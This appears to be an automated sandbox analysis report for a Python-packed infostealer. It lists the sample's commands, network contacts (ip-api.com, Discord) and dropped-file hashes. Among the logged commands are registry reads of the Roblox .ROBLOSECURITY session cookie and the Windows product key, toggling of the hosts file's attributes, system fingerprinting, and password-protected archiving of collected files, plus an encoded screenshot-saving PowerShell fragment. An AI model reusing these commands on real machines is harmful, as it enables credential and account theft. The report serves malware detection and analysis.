aABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55C1.tmp" "c:\Users\Admin\AppData\Local\Temp\v54d5zlo\CSCBDB55F8A6D445A0862CCE2F3F1F32A.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\iy0Fp.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\iy0Fp.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-npjqx.in | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI28442\python312.dll
| MD5 | cbd02b4c0cf69e5609c77dfd13fba7c4 |
| SHA1 | a3c8f6bfd7ffe0783157e41538b3955519f1e695 |
| SHA256 | ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5 |
| SHA512 | a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/2440-25-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI28442\base_library.zip
| MD5 | 630153ac2b37b16b8c5b0dbb69a3b9d6 |
| SHA1 | f901cd701fe081489b45d18157b4a15c83943d9d |
| SHA256 | ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2 |
| SHA512 | 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_ctypes.pyd
| MD5 | e7629e12d646da3be8d60464ad457cef |
| SHA1 | 17cf7dacb460183c19198d9bb165af620291bf08 |
| SHA256 | eb8affa4e7a4da15c9cda37c68ac8232d885a9d367b28973473949b205384789 |
| SHA512 | 974ae1607093161a5f33eda9e0a0ade214700d05eb728c8157e7b7589c587cc1cdefe0132d16d31c2941ed4eec4668428564609a0a2ced983c8b13f98a84801b |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/2440-30-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_ssl.pyd
| MD5 | a9f1bda7447ab9d69df7391d10290240 |
| SHA1 | 62a3beb8afc6426f84e737162b3ec3814648fe9f |
| SHA256 | 2bb05f7dbd21e67d2a6671411f8ae503dd7538a6767b2169b3033b695557ac13 |
| SHA512 | 539e94b59093dcf62d6f1a312d9b6aac27873f6416cde050e756e367b9907a8c0e7a31109a433b206bf023436d823d3d945f695cc7291604c0a24bcd27dc1451 |
memory/2440-48-0x00007FF802480000-0x00007FF80248F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_sqlite3.pyd
| MD5 | b8aa2de7df9ba5eab6609dcf07829aa6 |
| SHA1 | 4b8420c44784745b1e2d2a25bd4174fc3da4c881 |
| SHA256 | 644669d0875b33aa7e9d3f1856bc8b696f796ad61c7edb9219f8f0ff1a69531a |
| SHA512 | 5587efef4c349a137d785594bb7cbffef19fd418bf7d6fb2a4a3e2107354f5f874eeb7e18799031bde335bc65e4ca53f73793a60c67a5482c7e6d1564894ba17 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_socket.pyd
| MD5 | 4ee9483c490fa48ee9a09debe0dd7649 |
| SHA1 | f9ba6501c7b635f998949cf3568faf4591f21edd |
| SHA256 | 9c644a6db56052cf2680476648391b47b603957ffb353ad44a68dac761805ef1 |
| SHA512 | c55ddd782cc52d1aba6fd4466ed72387aad4debd3c48315db16aa35d3a5265478d8b197a3a0e0bcf9277004c10b4ccfe8706ab9d0e886d19c0cc4cb406fab4a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_queue.pyd
| MD5 | 048e8e18d1ae823e666c501c8a8ad1dd |
| SHA1 | 63b1513a9f4dfd5b23ec8466d85ef44bfb4a7157 |
| SHA256 | 7285eef53fd485d6093a9aecbe8fc87c6d70ae4e91d41f382a2a3edff7ebc6c8 |
| SHA512 | e57e162d1099b696d11bad172d36824a41fde3dd1d3be0dbd239746f8c87f17e78f889c8ad75ffdac89032b258e6f55f0dab82aae21b9d7ad166ceedfe131b61 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_lzma.pyd
| MD5 | ed348285c1ad1db0effd915c0cb087c3 |
| SHA1 | b5b8446d2e079d451c2de793c0f437d23f584f7b |
| SHA256 | fa84770ccf4394d046ed69edaea71957306a25def4986ee6650daf0a2c2d3e43 |
| SHA512 | 28a4c21bdb0bd697e93b276c184bfc5e317d930c4462e655d9d9ef7487168809ee952e32a856304cdd67a76d6b2286bf94fe9b9de6706c8d36a810aa916ce8e1 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_hashlib.pyd
| MD5 | 3c1056edef1c509136160d69d94c4b28 |
| SHA1 | e944653161631647a301b3bddc08f8a13a4bf23e |
| SHA256 | 41e4bb3c6064cb9e8a62e17056aea19e3d7e6ff1efc17c18d76118ac4e3b7243 |
| SHA512 | a03fcf2af6df72923714f66d26774a39e709fa8ad879d72b838d531692231f68480b5ff65b83358ad6b7b411f4ece7028a8613c3b1177acf1d3c933a843ca19a |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_decimal.pyd
| MD5 | 94fbb133e2b93ea55205ecbd83fcae39 |
| SHA1 | 788a71fa29e10fc9ea771c319f62f9f0429d8550 |
| SHA256 | f8e8fbeee7c8454fa42fe47f1da9c63f6b6e631b0dff22c80631f426efcba78b |
| SHA512 | b488f06be28fc8ffd3d8be6b986c7a35ab868198b10943bfa59b9130ebd50354adb9e1818b73ed1f2c92d33d869091e9167346b4430668ca31dd46a845276dea |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\_bz2.pyd
| MD5 | ba8871f10f67817358fe84f44b986801 |
| SHA1 | d57a3a841415969051826e8dcd077754fd7caea0 |
| SHA256 | 9d30387ee07585516f8ce479fcd4e052597835d4149568c1d8382a4a3a0ae7e1 |
| SHA512 | 8e23b032b785f37b920206fa3064c5fa0e28949f23b2e985fae26c9a355a6bc33dcd380925091f627d4d7936f0958e90fa7c022d89c73db8a1ea6ad267a1a341 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\unicodedata.pyd
| MD5 | 9a03b477b937d8258ef335c9d0b3d4fa |
| SHA1 | 5f12a8a9902ea1dc9bbb36c88db27162aa4901a5 |
| SHA256 | 4d6e035a366c6f74660f74b8b816add345fa7f1c6cf0793dcf1ed9f91b6ce6a4 |
| SHA512 | d3d8bb51474f93d02837580f53aacf5ca9eaf8587e83cddb742c707a251fe86f14e8e665aa4423ac99d74c6c94d95c7df3bfd513b3d5c69661e604f22dcabebe |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\sqlite3.dll
| MD5 | ce4f27e09044ec688edeaf5cb9a3e745 |
| SHA1 | b184178e8a8af7ac1cd735b8e4b8f45e74791ac9 |
| SHA256 | f940ff66960441c76a258846d66d4a357e72ad8fbb6bde62b5e5fbe90103b92d |
| SHA512 | bab572324dcf12e71fb6a9648e9224528bd29c75e7d3b978b7068eca0d6f2cb795165756249f47e1db401267b0a1e5fd06c35b6cf5595a013240f9e3444ea083 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\select.pyd
| MD5 | a71d12c3294b13688f4c2b4d0556abb8 |
| SHA1 | 13a6b7f99495a4c8477aea5aecc183d18b78e2d4 |
| SHA256 | 0f3ae1b65102d38f6b33fcbbdadd347aa1b0c09ed8028d4412982b3bd97caf0f |
| SHA512 | ff16cb399b661c170bf79108c62010d32804ead3f6c565b0755a26b62b4f51290bcb71face6cebaa82c0f9b3863aaaa7fa57ddc1e2bbae8598b047d01d15cbe5 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\rarreg.key
| MD5 | 9795f79ddb61aa29027f4d68496b379c |
| SHA1 | 2b28db4d9ac8cffba73048444b1df25346f4ef32 |
| SHA256 | e63f3d6710097498085564dfc85add6ed4cf44238c33d20820d2426abcee4e31 |
| SHA512 | e44fbbc02da75d173c81bdfda9b14102997609af06fd50c51030430c3c80193dadb632592997361c79b0dfed50ccc0e1743c306a881401a1c78a6a7facb45d4d |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI28442\blank.aes
| MD5 | 5a3735ca91c1c8c1a06e93f279fada39 |
| SHA1 | 0da37688e04f6540fa1370eb90c3b22dd6866433 |
| SHA256 | 3c5cff8ff19d7dad79b8cc0d6462f890b5659267377f603585e05d2c539a7f2c |
| SHA512 | 6008d317557bd51d38a02b3b343a34e375727d83fce897b7aa765fc4c3142efce1a4d4777801a49d34701467dcfaeb2d0abbb712dc4c1addae4f3f0e10f8e2dc |
memory/2440-54-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp
memory/2440-56-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp
memory/2440-58-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp
memory/2440-60-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp
memory/2440-62-0x00007FFFFA870000-0x00007FFFFA889000-memory.dmp
memory/2440-64-0x00007FF8009A0000-0x00007FF8009AD000-memory.dmp
memory/2440-68-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp
memory/2440-67-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp
memory/2440-71-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp
memory/2440-72-0x0000016835250000-0x0000016835779000-memory.dmp
memory/2440-73-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp
memory/2440-78-0x00007FF800550000-0x00007FF80055D000-memory.dmp
memory/2440-80-0x00007FFFEA8C0000-0x00007FFFEA9DB000-memory.dmp
memory/2440-77-0x00007FFFFA850000-0x00007FFFFA864000-memory.dmp
memory/2440-76-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5zgmqzll.hfy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2268-81-0x000001BAA47E0000-0x000001BAA486A000-memory.dmp
memory/2268-91-0x000001BA8C620000-0x000001BA8C630000-memory.dmp
memory/2268-92-0x000001BAA4780000-0x000001BAA47A2000-memory.dmp
memory/2268-93-0x000001BAA4B80000-0x000001BAA4C82000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | a43e653ffb5ab07940f4bdd9cc8fade4 |
| SHA1 | af43d04e3427f111b22dc891c5c7ee8a10ac4123 |
| SHA256 | c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe |
| SHA512 | 62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bd5940f08d0be56e65e5f2aaf47c538e |
| SHA1 | d7e31b87866e5e383ab5499da64aba50f03e8443 |
| SHA256 | 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6 |
| SHA512 | c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
memory/2440-195-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.cmdline
| MD5 | b7a2ba3171ac95da326d0ea6b07a60c9 |
| SHA1 | 20cd39792d922b92564f81b7ae76085e992e447a |
| SHA256 | 6fa77b177bd2f07a61a0edecb35b54dcf67e01cd125f4f682bb73fb5bd41673d |
| SHA512 | 7daa42ad4eae6bc81ef9873c507da2eb75816db5b32fb3b0ff6afca20f8158d044736670a9dadcebb033d70219db6f57a8aaa6499f049e52bbf53e70888149a5 |
\??\c:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\v54d5zlo\CSCBDB55F8A6D445A0862CCE2F3F1F32A.TMP
| MD5 | 581de57f0a125d78d7be5c287f6fcac1 |
| SHA1 | 77f1489e7e4022d439a90e545b1263af9f20bf9b |
| SHA256 | fa37137a885fc0beffaf2447811346b7ab14754a9027d75e009883bf8cf0c413 |
| SHA512 | 2155a3129487ac0963bfa33d92e1af36a6e19667a0ff37e0e6bc14cba0bc8e51155c5119e245ffbaadfc713d4ee837e2f403b57aa2fdaa4aff5cf6f68ac565d7 |
C:\Users\Admin\AppData\Local\Temp\RES55C1.tmp
| MD5 | fd662b352383ae5fbf5067b19d454c8e |
| SHA1 | 8a116a84e85fe243d0b143c62b3c68545a8cd5b8 |
| SHA256 | fb750a268066a3a7cdce99d8481e0dabb7f9c2762a72353fc69eec8cc4ae2445 |
| SHA512 | 126b05f03ae8ce512f62aadc6ee53051b4255ff52177ee89254601d1f5a9706675e3c5efce5be134cc62605a2e0fd8d670424e4bf84c6ca6fd0709407ccd8213 |
C:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.dll
| MD5 | 6296f9054e166af65888756f728fef67 |
| SHA1 | 9941775b964b66aa877217c696fc7f9dba21d1b7 |
| SHA256 | bee9ce930ddd68a556654b4e6aad690cfcd744af91a7ffa5f88be50007ab92c8 |
| SHA512 | 63846bda4af39b770283b7d3950379f987032365e737daae37a03949a8f035ebab0aee083ae81e63452e81cc061cc4a860731ab621082f4194a9543f9d0a4c89 |
memory/444-206-0x000001F92AD20000-0x000001F92AD28000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 76d59c64e979bab28e3e7b45472b534f |
| SHA1 | 3dc1ed7bdb597673903d6ca30c9fc64d318f323e |
| SHA256 | 108a21a4f80a4f38ea4046be932111af838a96189e6e4187181ddfe863f6e0aa |
| SHA512 | 977144e8813075043e49a178e76bd78328c8b9629331b0b05795672f41fe5a7497e65fda8706a913a2540d7f400d3388c55bf299a6dc25f8cf5c8849802428b2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8c272630e8e17428959afdf706dd25f2 |
| SHA1 | fbb34885bdd622ad0cd223158c061afb79ecf575 |
| SHA256 | 516b559dd72807ab74670c2838aecb8042483d94dcadd774f2636a54e116e1b9 |
| SHA512 | d5ae6616d4c36b6134b325e1880ff44e5c90e858989d8199a1137b07b6f0ad3242fafc320adc337148eedb61459ce97116259b4b6aa2c4c0beedd37d8e269cff |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 294161619808bd41f256c353f878f439 |
| SHA1 | 1a28db8fdef878f218658e6c567c4503cecfe651 |
| SHA256 | 9daca77ae4f32383c3ecdbc9e7af21f1289a734b60d2f4b1156f14648574c9a8 |
| SHA512 | 51bb097d77cea4a49169364d3aa1dcc3c2ed76334a4a665906b5de35cb7441806ecc871cb40a5a93ac89a80181621f522847009f3aa1475c4331d1058f04e1b9 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\EnableUnblock.jpg
| MD5 | faa153f7d05ada888013704399274557 |
| SHA1 | df6eb15ef496c0ba014419e56e44d78d95cc761e |
| SHA256 | 0139bcb790d43b318ca7ba78cfd545192b7aca3303d5b2da239666e1951d2609 |
| SHA512 | 546fb950e20c60cb47b69cb32e68e5431572fed78b0032f32100ad2880ab0c5f70a68781eb005d8cb6189fd397ebf450016de4ea72d0b484d264d0ed698644ea |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\StepUnprotect.mp3
| MD5 | 835fd1f498495bac0812bcd56900c8a1 |
| SHA1 | 533497540b30ef501c3e1a108f48b21081e1bb18 |
| SHA256 | 5c8c7d71c36cd952b57ec6bef11bb37b5aa3aa00bce8a80c53ff8e59bd44ca8d |
| SHA512 | fcfdca46455c056e43ac03afdc6e653910be366f0dccccfde162c6ec3803931a0e36af21702dc6471ccd898c1d4a640eb5fdfa1dcf7aaf1da299447e46bcf12f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\CloseTest.csv
| MD5 | a452bfe056a43077cb5afd91124b6a0f |
| SHA1 | 41229da53f00cad75a51459ad234a6b8f6557d39 |
| SHA256 | 5259629793bf1ae401c3e43d930e0e66c23fd79edae2e27e7e92c6213d3f19a5 |
| SHA512 | 1aa45f97d30eec2c514af518986f3e07fd51f23d6417bcfd947774b30a687c8393f9ed359dbfbf87269adc8924ebcc5728b5e11132979cf5d4ca583b2313c55d |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\CompareTest.pdf
| MD5 | 5fb0aff7e82093558b4ad7280fcd1702 |
| SHA1 | 07745b4feacb0d8331ce3e2c4346f14367bfea2f |
| SHA256 | bd7a21dd47b3eabb3d0b73111260ec60a8720b02dfa71dfbee9739fd9db44223 |
| SHA512 | 8a8627fa6d66481016277d86142f83306d6822f6fd3d218b508356d8dd69251ee0869030469d2a4186b4ad45afb2735c10b0a41fc295c5343d84228c7a06e738 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\CompressSubmit.txt
| MD5 | fe4a7e5372b5ac271d16595b93abac87 |
| SHA1 | c8577a9219c776a443715d8536bbf3bf7aeabb8b |
| SHA256 | df52a946240dd831cef6299bfac5a4a0b8d66e1f47b59428656fef4f3511c755 |
| SHA512 | c62c264bf4edc6acad5cfe7508659381417bcdc0927d0c3caa903bd937bfe6762048731c5037e92f1e1f306c60436c9c009f2617053e0dafbd7b171292007ede |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
